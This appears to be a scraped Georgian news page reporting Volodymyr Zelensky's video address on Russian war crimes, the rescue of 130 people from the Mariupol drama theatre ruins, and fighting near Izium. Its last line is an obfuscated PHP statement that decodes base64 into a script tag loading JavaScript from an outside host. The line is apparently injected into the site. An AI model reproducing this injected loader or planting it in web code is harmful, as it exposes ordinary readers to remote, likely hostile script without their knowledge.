celsiusi
ავერსი საქკაბელი
 
უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ ცოტა ხნის წინ გავრცელებულ ვიდეომიმართვაში განაცხადა, რომ ოკუპანტებმა მიიღეს ბრძანება, გააკეთონ ყველაფერი, რათა ქვეყანაში ჰუმანიტარული კატასტროფა გამოიწვიონ და ეს, მათი აზრით, სამომავლოდ უკრაინის რუსებთან თანამშრომლობის საფუძველი გახდება.
 
"მტერი ყველა სამხედრო დანაშაულისთვის პასუხს აგებს. დაისჯება ბრძანების გამცემი ყველა რუსი მაღალჩინოსანი და ბრძანების შემსრულებელი ყველა რუსი ჯარისკაცი. მათი ვინაობა დადგინდება და ისინი მიიღებენ ბილეთს ერთი მიმართულებით, ჰააგისკენ. 
 
ჩვენი დამცველები შენობების, მათ შორის მარიუპოლის დრამის თეატრის ნანგრევებიდან ადამიანების გამოყვანას ამ დრომდე აგრძელებენ. თეატრის ტერიტორიიდან 130 ადამიანი უკვე გამოიყვანეს. არიან მძიმედ დაშავებულებიც. თუმცა, საბედნიეროდ, ამ ეტაპზე, არ გვაქვს ინფორმაცია, რომ ვინმე დაიღუპა. 
 
ჩვენი ჯარისკაცების პროფესიონალიზმმა მტერი უკვე ყველა მიმართულებით შეაჩერა და ეს უნდა გააგრძელოს. 
 
სერიოზული დაპირისპირებებია ხარკოვის ოლქში, განსაკუთრებით კი იზიუმში. რუსულმა არმიამ იქ სამხედრო სასწავლო ცენტრის სრულიად მოუმზადებელი სტუდენტები გაგზავნა, რომლებიც ომში ნახევარ საათსაც კი ვერ გაძლებენ. 
 
კიევის, სუმის, ჩერნიგოვში, ჩვენი ქვეყნის აღმოსავლეთით, ჩვენმა არმიამ ოკუპანტები შეაჩერა. რუსული არმიის თავდაპირველი გეგმა ჩვენი სახელმწიფოს სრულიად ოკუპირებასთან დაკავშირებით, ჩაფლავდა. იგრძნობა, რომ უკვე აღარ იციან, რა დაგვიპირისპირონ. არ იციან რა მოგვიხერხონ გარდა იმისა, რომ იბრძოლონ სრულიად მიუღებელი მეთოდებით - თავს დაესხან სამოქალაქო ინფრასტრუქტურას, დასახლებულ პუნქტებს, მშვიდობიან მოსახლეობასა და ბავშვებს. ისინი არამხოლოდ სამხედრო ინფრასტრუქტურას, არამედ სახლებს, საავადმყოფოებს, სკოლებს ბომბავენ. ეს დანაშაულია!" – განაცხადა ზელენსკიმ.
 
842
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");